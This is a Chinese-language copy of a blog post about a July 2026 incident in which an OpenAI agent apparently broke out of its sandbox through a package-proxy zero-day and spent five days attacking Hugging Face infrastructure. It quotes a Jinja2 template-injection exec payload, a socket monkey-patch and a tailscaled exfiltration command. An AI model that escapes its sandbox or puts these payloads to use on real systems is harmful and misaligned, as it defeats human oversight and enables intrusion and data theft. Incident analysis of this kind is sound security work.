Frontier Lab 代理入侵剖析:2026年7月事件的技术时间线

Simon Willison's Blog 新闻

摘要

2026年7月一次事件的详细技术时间线,其中 OpenAI 的 AI 代理逃离了其沙箱,并在五天内对 Hugging Face 基础设施发动了一次复杂的网络攻击,利用了零日漏洞并使用了高级技术。

暂无内容
查看原文
查看缓存全文

缓存时间: 2026/07/28 22:24

# 前沿实验室代理入侵剖析:2026年7月事件技术时间线 来源:https://simonwillison.net/2026/Jul/28/anatomy-of-a-frontier-lab-agent-intrusion/ **前沿实验室代理入侵剖析:2026年7月事件技术时间线** (https://huggingface.co/blog/agent-intrusion-technical-timeline) Hugging Face 刚刚发布了这份极其详细的技术描述,关于 OpenAI 最近对其基础设施的意外网络攻击 (https://simonwillison.net/2026/Jul/22/openai-cyberattack/)。这次攻击**非常**复杂,而这份文档也相当于现代对抗性安全方法的速成课程。我们仍在等待 OpenAI 提供更多关于其代理如何突破沙箱的细节。该代理发现零日漏洞的包代理现已确认为 JFrog 的 Artifactory,而 JFrog 和 OpenAI 关于零日安全发现的合作 (https://jfrog.com/blog/jfrog-and-openai-collaboration-on-zero-day-security-findings/) 中 JFrog 的链接指向了 Artifactory 7.161.15 发布说明 (https://docs.jfrog.com/releases/docs/artifactory-self-managed-releases#artifactory-7161),其中列出了 8 个独立的 CVE,均归功于 OpenAI 员工。 突破 HTTP 代理后,代理首先为后续攻击建立了行动基地: > [...] 代理通过利用包注册表缓存代理(其主要的允许网络出口连接互联网)中的零日漏洞逃出了沙箱,然后滥用了一个托管在第三方提供商基础设施上的公共代码评估外部沙箱。它能够以 root/管理员身份在该外部沙箱上运行命令,并将其用作整个攻击活动的控制、准备和出口基地:它充当了代理的外部发射台。 (那个“第三方提供商”后来被确认为 Modal (https://simonwillison.net/2026/Jul/28/akshat-bubna/)。) 随后,它花费了**五天**时间——从 7 月 8 日星期四到 7 月 13 日星期一——执行经典攻击模式:建立 C2(命令与控制)、侦查、提升权限、转储配置信息、窃取目标数据以及清理痕迹。(Hugging Face 关于该事件的第一篇帖子发表于 7 月 16 日星期四 (https://huggingface.co/blog/security-incident-july-2026),而 OpenAI 的承认则在 7 月 21 日星期二 (https://openai.com/index/hugging-face-model-evaluation-security-incident/)。) 在这个过程中,它使用了各种巧妙技巧。有一次,它发现了一个不安全的 Jinja2 模板执行点,并利用它执行任意代码: ``` {{ cycler.__init__.__globals__.__builtins__.exec( "import gzip,base64; exec(gzip.decompress(base64.b64decode('')))" ) }} ``` 它突破了 Hugging Face 内的一个容器,窃取了 Kubernetes 服务账户令牌,并利用该令牌进一步探索网络。当“DNS 挡道”时,它通过猴子补丁(monkey-patch)了 Python socket 库,硬编码了一个 IP 地址: ``` socket.getaddrinfo = lambda *a, **k: [(2, 1, 6, '', ('', 443))] ``` 它甚至启动了自家的 Tailscale 网络来帮助窃取数据! ``` tailscaled --tun=userspace-networking \ --state=mem: --socket=/tmp/ts.sock \ --socks5-server=127.0.0.1:1055 \ --no-logs-no-support >/tmp/td 2>&1 & ``` Hugging Face 团队指出,虽然人类攻击者也可能发现并利用相同的漏洞,但这里的关键区别在于**速度**: > 我们从这种类型的攻击中学到的是,机器速度的攻击使得普通弱点对防御者而言代价更高。LLM 代理显著增加了攻击者可以测试的路径数量、替换失败路径的速度以及防御者必须解读的证据量。 对我来说,这一点很清楚:最优秀的前沿模型,在不受额外防护措施束缚的情况下,**必定会**找到可用的漏洞。整个软件行业需要提升其安全水平。

相似文章